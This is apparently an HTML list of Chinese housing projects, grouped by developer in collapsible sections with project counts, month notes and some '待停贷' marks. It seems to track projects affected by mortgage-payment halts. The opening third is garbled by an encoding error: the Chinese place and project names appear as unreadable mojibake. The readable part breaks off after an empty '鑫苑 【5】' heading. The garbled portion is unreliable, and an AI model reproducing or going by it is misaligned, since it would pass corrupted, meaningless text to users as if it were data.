ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅคฉไธ‹ไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๅคงๆ‚ฆๆน–ๅ•†ไธšๅนฟๅœบ๏ผˆ12ๆœˆ๏ผ‰,<br> ๅ‰ๆž—็œ-ๅ…ฌไธปๅฒญๅธ‚-ๆ’ๅคง่Šฑๆบช่ฐทๆˆ–ๆฐดไธ–็•Œ,<br> ๆฑŸ่‹็œ-ๅฎฟ่ฟๅธ‚-ๆ’ๅคงๆ‚ฆๆพœๆนพ,<br> ๆฑŸ่‹็œ-ๆณฐๅทžๅธ‚-ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›,<br> ๆฑŸ่‹็œ-ๆ‰ฌๅทžๅธ‚-ๆ’ๅคง่ง‚ๆพœๅบœ,<br> ๆฑŸ่‹็œ-้•‡ๆฑŸๅธ‚-ๆ’ๅคง็ซฅไธ–็•Œ,<br> ๆฑŸ่ฅฟ็œ-่ตฃๅทžๅธ‚-ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคง็‘ๅบญ,<br> ๆฑŸ่ฅฟ็œ-ๆ™ฏๅพท้•‡ๅธ‚-ๆ’ๅคงๆ‚ฆๅบœ,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ๆ’ๅคง็บๅบญ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ๆ’ๅคงๆž—ๆบชๅบœ๏ผˆ10ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-่ไนกๅธ‚-ๆ’ๅคงๅพกๅบœไบŒๆœŸ,<br> ๆฑŸ่ฅฟ็œ-ๆ–ฐไฝ™ๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ๏ผˆ9ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅฎœๆ˜ฅๅธ‚-ๆ’ๅคง็ปฟๆดฒๅ››ๆœŸ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคง็››ไบฌ็บๅบญ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคง่ฅฟๆฑŸๅคฉๆ‚ฆ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-ๆ’ๅคงไธญๅคฎๅนฟๅœบ,<br> ๅฎๅคๅ›žๆ—่‡ชๆฒปๅŒบ-้“ถๅทๅธ‚-ๆ’ๅคง็บ็ฟๅบœ,<br> ๅฑฑไธœ็œ-ๆท„ๅšๅธ‚-ๆ’ๅคงๅ…ป็”Ÿ่ฐท,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคงๆปจๆฒณๅบœไบŒๆœŸ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ๅ…ซๆœŸ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคง้‡‘็ขงๅคฉไธ‹ไบ”ๆœŸ๏ผˆๅ…ซๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅคชๅŽŸๅธ‚ๆ’ๅคงๅพกๆ™ฏๆนพ4ๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> 
ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคงๆž—ๆบช้ƒก๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ๏ผˆ7ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๅพท้˜ณๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ,<br> ๅ››ๅท็œ-ๆณธๅทžๅธ‚-ๆ’ๅคง็ฟก็ฟ ๆนพ,<br> ๅ››ๅท็œ-็œ‰ๅฑฑๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅคฉๆดฅๅธ‚-ๆญฆๆธ…ๅŒบ-ๆ’ๅคง็ฟก็ฟ ๆนพ๏ผˆ10ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคงๅŸŽ๏ผˆ9ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคง็Ž–็‘ๆนพ๏ผˆ9ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคง้˜ณๅ…‰ๅŠๅฒ›๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆ’ๆณฐ้›†ๅ›ข ใ€2ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๆณฐ่Š™่“‰ๆ‚ฆๅบœ,<br> ๆฑŸ่‹็œ-่ฟžไบ‘ๆธฏๅธ‚-ๆ’ๆณฐๆ‚ฆ็‘ๅบœ </details> <details> <summary><b> ่กก้˜ณๅธ‚ไบšๆๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-่กก้˜ณๅธ‚-ๅŽๆบๅŒ—่ก— </details> <details> <summary><b> ๅฎไฟก็ฝฎไธš ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๆตฆไธœๆ–ฐๅŒบ-ไธŠๆตทๆตฆไธœๆ–ฐๅŒบๅ›ๅพกๅ…ฌ้ฆ† </details> <details> <summary><b> ้ธฟๆตทๅœฐไบง ใ€1ใ€‘</b></summary> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-้ธฟๆตทๅŸŽ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆน–ๅŒ—่”ไนๅพท่ƒœๆŠ•่ต„็ฎก็†ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-่”ไนๅนฟๅœบ </details> <details> <summary><b> ๆน–ๅ—ๅฅฅไฝ“็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-่กกไธœๅŽฟ-ๅฅฅไฝ“ๅ…ฌ้ฆ† </details> <details> <summary><b> ๆน–ๅ—ๅ’Œ่พพๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-ๅ’Œ่พพๆปจๆฑŸๅ…ฌๅ›ญ </details> <details> <summary><b> ๆน–ๅ—็บขๆ˜Ÿๅคฉๆˆๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-้•ฟๆฒ™ๆ–‡ๆ™ฏ </details> <details> <summary><b> ๆน–ๅ—ไนๅŽๅ›ฝ้™…ๆ–ฐๅŸŽๅผ€ๅ‘ๅปบ่ฎพๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-้‡‘ๅฅฅๆน˜ๆฑŸๅ…ฌ้ฆ† </details> <details> <summary><b> ๆน–ๅ—็œๆน˜ๆฑ‡็ฝฎไธšๅ‘ๅฑ•๏ผˆ้›†ๅ›ข๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆฐธๅทžๅธ‚-่ˆœๅพทๆน˜ๆฑŸ </details> <details> <summary><b> ่Šฑๆ ทๅนด ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-้„‚ๅทžๅธ‚่Šฑๆ ทๅนด้ฆ™้—จ็ฌฌ </details> <details> <summary><b> ๅŽๅคๅนธ็ฆ ใ€4ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-ๅŽๅคๅนธ็ฆยทๅ››ๅญฃๅ…ฌ้ฆ†,<br> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-ๅŽๅคๅนธ็ฆๅญ”้›€ๅŸŽๅคง่ฟๆฒณๆ™บๆ…ง่ก—ๅŒบ๏ผˆ้ฆ™ๆฒณ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท,<br> ๆฑŸ่‹็œ-ๅ—ไบฌๅธ‚-้‡‘้™ตๅŽๅคไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ไฝณๅ…†ไธš ใ€5ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆฒ™ๅชๅๅŒบ-ไฝณๅ…†ไธšยทๅ‡ค้ธฃๆฐดๅฒธ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ไฝณๅ…†ไธšๆ—ถไปฃๅคงๅŽฆ,<br> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ไฝณๅ…†ไธšๆจพไผดๅฑฑ,<br> ไธŠๆตทๅธ‚-ๅ˜‰ๅฎšๅŒบ-ๅพ่กŒไฝณๅ…†ไธšไบ”ๆœŸ,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ไฝณๅ…†ไธšๅŸŽๅธ‚ๅนฟๅœบ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅปบไธšๅœฐไบง่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้นคๅฃๅธ‚-ๆท‡ๅŽฟๅปบไธšๅŸŽ </details> <details> <summary><b> ๆฑŸ่‹ไธญๅ—ๅปบ่ฎพ้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-ไธญๅ—ๆž—ๆจพๅฐๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไธญๅ—ไธŠๆ‚ฆๅŸŽๅ››ๆœŸ,<br> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ๆญๅทžไธญๅ—ๆ˜ฅๆบช้›† </details> <details> <summary><b> ๆฑŸ่ฅฟไธญ้‡‘้ป„้‡‘็ ๅฎ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ไธญ้‡‘ไธญๅฟƒ </details> <details> <summary><b> ้‡‘็ง‘ๅœฐไบง้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€4ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-่Š™่“‰ๅ…ฌ้ฆ†๏ผˆ9ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-่ฎธๆ˜Œๅธ‚-้‡‘็ง‘้นฟ้ธฃๅธๆ™ฏ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-้‡‘็ง‘้›†็พŽไธœๆ–น,<br> ๆต™ๆฑŸ็œ-ๅ˜‰ๅ…ดๅธ‚-ๆกไนก้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ </details> <details> <summary><b> ้”ฆไธšๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-้”ฆไธš6ๅทๅบœ้‚ธ </details> <details> <summary><b> ้”ฆ่‰บ็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> 
ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้”ฆ่‰บ่ฝป็บบๅ››ๆœŸๆœชๆฅๅ…ฌๅฏ“,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้พ™ๆน–้”ฆ่‰บๅŸŽ้ซ˜ๅ…ญ,<br> ๅ››ๅท็œ-ๅนฟๅฎ‰ๅธ‚-ๅธ่ฐทๅ…ฌๅ›ญๅŸŽไธ‰ๆœŸ </details> <details> <summary><b> ๅฑ…ๆ˜“็ฝฎไธš ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-่ฅ้˜ณๅธ‚-ๅฑ…ๆ˜“่ฅฟ้ƒก </details> <details> <summary><b> ๅบทๆกฅๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€8ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ็Ž–็Žบๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้‚ฃไบ‘ๆบช๏ผˆ8ๆœˆ),<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅๆœชๆฅๅ…ฌๅ…ƒ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้ฆ™ๆบช้ƒก,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅๆ‚ฆๆบชๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้˜…ๆบช้›…่‹‘,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๅบทๆกฅๆ‚ฆ่“‰ๅ›ญ๏ผˆ9๏ผ‰ </details> <details> <summary><b> ไนๅŽๆ’ไธš้›†ๅ›ข ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไนๅŽๅŸŽ้ฆ™ๆฆญๅบ„ๅ›ญ </details> <details> <summary><b> ้พ™ๅ…‰้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ๅ‰ๆตทๅคฉๅขƒ่Šฑๅ›ญ </details> <details> <summary><b> ้พ™ๅฃๅธ‚ไธญๅฎ‡ๆˆฟๅœฐไบงๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฑฑไธœ็œ-็ƒŸๅฐๅธ‚-ๆพ้šฝ้˜ณๅ…‰ๅŸŽ๏ผˆ12ๆœˆ๏ผ‰ </details> <details> <summary><b> ้š†ๅŸบๆณฐๅ’Œ ใ€4ใ€‘</b></summary> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ,<br> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-้š†ๅŸบๆณฐๅ’Œๆถฟๅทž็ดซๆ‚ฆๅฐๅŒบ,<br> ๆฒณๅŒ—็œ-ๆฒงๅทžๅธ‚-็ดซๆจพ้ฆ™ๆฆญ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไธ‡ๅ’Œ้ƒก </details> <details> <summary><b> ็ปฟๅœฐ ใ€18ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ไธ‡ๅทžๅŒบ-ไธ‡่ƒๅŸŽไบŒๆœŸ๏ผˆ12ๆœˆ๏ผ‰,<br> ็”˜่‚ƒ็œ-ๅ…ฐๅทžๅธ‚-ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๆปจๆน–ๅ›ฝ้™…ๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๅŸŽไบŒๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๆบฑๆฐดๅฐ้•‡,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅ…‰่ฐทไธญๅฟƒๅŸŽ,<br> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™,<br> ๆฑŸ่ฅฟ็œ-่ตฃๅทžๅธ‚-็ปฟๅœฐๅš่งˆๅŸŽ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™๏ผˆ9ๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-็ปฟๅœฐๆ–ฐ้‡ŒๅŸŽไบŒๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅ›ฝ้™…ๆธฏๅŠกๅŒบ็ปฟๅœฐๅ›ฝๆธฏๆ–ฐ้‡ŒๅŸŽไธ€ๆœŸ๏ผˆๅพ…ๅœ่ดท๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-็ปฟๅœฐ็’€็’จๅคฉๅŸŽไบŒๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-็ปฟๅœฐๆ–ฐ้‡Œ็จ‹ไธ‰ๆœŸๅ…ฐไบญๅ…ฌ้ฆ† </details> <details> <summary><b> ็พŽๅฅฝ็ฝฎไธš้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็พŽๅฅฝ้ฆ™ๅŸŸ่Šฑๅขƒ </details> <details> <summary><b> ๅ้—จๅœฐไบง ใ€4ใ€‘</b></summary> ๆฒณๅ—็œ-ๅ•†ไธ˜ๅธ‚-ๅ้—จๅŸŽไบ”ๆœŸ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จ็ฟ ๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จๅคฉๅขƒ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จ็ดซๅ›ญ </details> <details> <summary><b> ๅ—ๅ……้€ธ่พพ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅ—ๅ……ๅธ‚-ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅ—ๅฎๅธ‚็Ž‰ๆกถ้‡‘ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-้‡‘็ง‘ๅš็ฟ ๅฑฑ </details> <details> <summary><b> ๅ†…่’™ๅค้ผŽ่ฏšๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ†…่’™ๅค่‡ชๆฒปๅŒบ-ๅ‘ผๅ’Œๆตฉ็‰นๅธ‚-้ฆ™ๅข…ๅฒญ่ฅฟๅŒบ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅนณ่ˆ†ๅŽฟ่ฑซไธฐ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ๅนณ่ˆ†ๅŽฟๆน–็€่“ๅฒธ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅ•Ÿ็ฆ็ฝฎไธš่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ•Ÿ็ฆๅŸŽ </details> <details> <summary><b> ๅบ†้˜ณๅธ‚ไธ‡ไธ–ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ็”˜่‚ƒ็œ-ๅบ†้˜ณๅธ‚-ๅ›ฝ้‡‘one๏ผˆ11ๆœˆ๏ผ‰ </details> 
<details>
<summary><b> 融创 【25】</b></summary>
重庆市-璧山区-璧山区融创城（9月）,<br>
重庆市-渝北区-融创隐溪晓院一二三期,<br>
广西壮族自治区-北海市-融创海映兰屿三期,<br>
广西壮族自治区-桂林市-桂林融创文旅城N4地块,<br>
广西壮族自治区-桂林市-融创文旅城N5地块（12月）,<br>
广西壮族自治区-桂林市-融创文旅城N7地块（10月）,<br>
广西壮族自治区-南宁市-融创融公馆11、12号楼（8月）,<br>
河北省-石家庄市-融创城一期（11月）,<br>
河南省-许昌市-融创观河宸院,<br>
河南省-郑州市-融创中原大观二期,<br>
河南省-郑州市-郑州融创御湖宸院三期,<br>
辽宁省-大连市-融创海逸长洲,<br>
山东省-济南市-融创中新国际城四期南区,<br>
山东省-青岛市-李沧区融创悦山二期,<br>
山东省-青岛市-青岛海洋活力区融创中心三期（10月）,<br>
山东省-青岛市-西海岸新区融创影都学府三期（9月）,<br>
山西省-太原市-太原市融创中心,<br>
陕西省-西安市-融创东方宸院DK5,<br>
陕西省-延安市-延安融创宸院,<br>
四川省-都江堰市-融创文旅滨江新区（8月）,<br>
四川省-眉山市-眉山市彭山区融创水郡未来城（江口水镇）（10月）,<br>
天津市-北辰区-融创津宸壹号,<br>
天津市-北辰区-融创御景宸院,<br>
天津市-天津城区-融创南开宸院二期,<br>
云南省-大理白族自治州-大理的小院子北区（12月）
</details>
<details>
<summary><b> 瑞新（平潭）投资有限公司 【1】</b></summary>
福建省-福州市-平潭综合实验区金顺新光明城（9月）
</details>
<details>
<summary><b> 三盛控股（集团）有限公司 【3】</b></summary>
江苏省-常州市-三盛璞悦湾,<br>
山东省-青岛市-三盛国际海岸五期（9月）,<br>
四川省-成都市-三盛翡俪山（8月）
</details>
<details>
<summary><b> 山湖海集团 【1】</b></summary>
湖南省-常德市-汉寿县山湖海上城二期、三期
</details>
<details>
<summary><b> 陕西宁润实业集团有限公司 【1】</b></summary>
陕西省-西安市-国际幸福城
</details>
<details>
<summary><b> 上海海东房地产有限公司 【1】</b></summary>
上海市-浦东新区-临港万祥颐景园江南院
</details>
<details>
<summary><b> 上海兴宸房地产开发有限公司 【1】</b></summary>
上海市-浦东新区-周浦合富广场
</details>
<details>
<summary><b> 石家庄中融汇通房地产开发有限公司 【1】</b></summary>
河北省-石家庄市-石家庄赫石府
</details>
<details>
<summary><b> 实地地产集团有限公司 【7】</b></summary>
河南省-安阳市-紫薇公馆,<br>
湖北省-荆门市-实地紫薇雅著,<br>
山东省-青岛市-实地蔷薇国际,<br>
天津市-宝坻区-宝坻区实地海棠雅著圣景豪庭,<br>
天津市-天津城区-实地海棠雅著圣景豪庭（8月）,<br>
天津市-天津城区-实地蔷薇（9月）,<br>
云南省-昆明市-实地花鹤翎（10月）
</details>
<details>
<summary><b> 世茂集团 【5】</b></summary>
重庆市-巴南区-世茂·江城铭著,<br>
福建省-福州市-世茂泰禾青云小镇（9月）,<br>
江西省-南昌市-世茂泰禾南昌院子,<br>
山东省-青岛市-西海岸新区世茂•香奈公馆（10月）,<br>
陕西省-西安市-世茂璀璨倾城二期（7月）
</details>
<details>
<summary><b> 四川蓝光发展股份有限公司 【5】</b></summary>
重庆市-渝北区-蓝光未来城,<br>
广西壮族自治区-南宁市-蓝光雍锦澜湾,<br>
湖北省-襄阳市-蓝光雍锦园,<br>
山东省-青岛市-黄岛蓝光雍锦半岛（6月),<br>
云南省-昆明市-蓝光德商天域（8月）
</details>
<details>
<summary><b> 泰禾 【8】</b></summary>
广东省-中山市-泰禾金尊府,<br>
湖北省-武汉市-泰禾知音湖院子（君悦花园）,<br>
江苏省-苏州市-泰禾金尊府（8月),<br>
江苏省-镇江市-句容市宝华镇泰禾金尊府,<br>
山西省-太原市-泰禾金尊府,<br>
上海市-崇明区-崇明长兴岛泰禾大城小院,<br>
上海市-奉贤区-上海市奉贤区泰禾海上院子,<br>
浙江省-杭州市-富阳区泰禾大城小院楼盘
</details>
<details>
<summary><b> 天房集团 【1】</b></summary>
天津市-天津城区-天津天房樾梅江住宅
</details>
<details>
<summary><b> 天山房地产开发集团有限公司 【1】</b></summary>
河北省-邢台市-天山熙湖二期_名玉家园（待停贷）
</details>
<details>
<summary><b> 天泽集团 【1】</b></summary>
福建省-福州市-天泽奥莱时代（8月）
</details>
<details>
<summary><b> 万科 【1】</b></summary>
广东省-广州市-万科海上明月（9月）
</details>
<details>
<summary><b> 吴川市盈润置业有限公司 【1】</b></summary>
广东省-湛江市-吴川奥园冠军城一期
</details>
<details>
<summary><b> 武汉当代科技产业集团股份有限公司 【3】</b></summary>
湖北省-武汉市-当代铭山筑(人福国际健康城)（7月）,<br>
陕西省-西安市-西安沣东新城君合天玺,<br>
四川省-成都市-武侯新城当代璞誉（7月）
</details>
<details>
<summary><b> 武汉千里丰房地产开发有限公司 【1】</b></summary>
湖北省-武汉市-新洲中新盛景
</details>
<details>
<summary><b> 西安浩丰房地产开发有限公司 【1】</b></summary>
陕西省-西安市-西安铭鸿中心二期
</details>
<details>
<summary><b> 西安名京房地产开发有限公司 【1】</b></summary>
陕西省-西安市-西安名京院望
</details>
<details>
<summary><b> 西安曲江文化产业投资（集团）有限公司 【1】</b></summary>
浙江省-杭州市-曲江新鸥鹏第三城（待停贷）
</details>
<details>
<summary><b> 西安同成置业有限公司 【1】</b></summary>
陕西省-西安市-鄠邑区名仕华庭
</details>
<details>
<summary><b> 西安四德置业有限公司 【1】</b></summary>
陕西省-西安市-西安灞桥区易合坊（相关报道）
</details>
<details>
<summary><b> 湘潭市花千树房地产开发有限公司 【1】</b></summary>
湖南省-湘潭市-湘台国际花园二期
</details>
<details>
<summary><b> 孝感润达投资有限公司 【1】</b></summary>
湖北省-孝感市-润达·壹号广场
</details>
<details>
<summary><b> 合信控股 【2】</b></summary>
江苏省-无锡市-天渝骄园,<br>
山东省-青岛市-胶州合信天骄云麓
</details>
<details>
<summary><b> 新城控股 【1】</b></summary>
北京市-石景山区-禧悦学府（悦创佳苑）
</details>
<details>
<summary><b> 新力地产集团有限公司 【2】</b></summary>
湖南省-长沙市-新力铂园（8月）,<br>
江西省-南昌市-新力城
</details>
<details>
<summary><b> 新尚置业 【1】</b></summary>
四川省-成都市-新尚尚院（10月）
</details>
<details>
<summary><b> 鑫苑 【5】</b></summary>
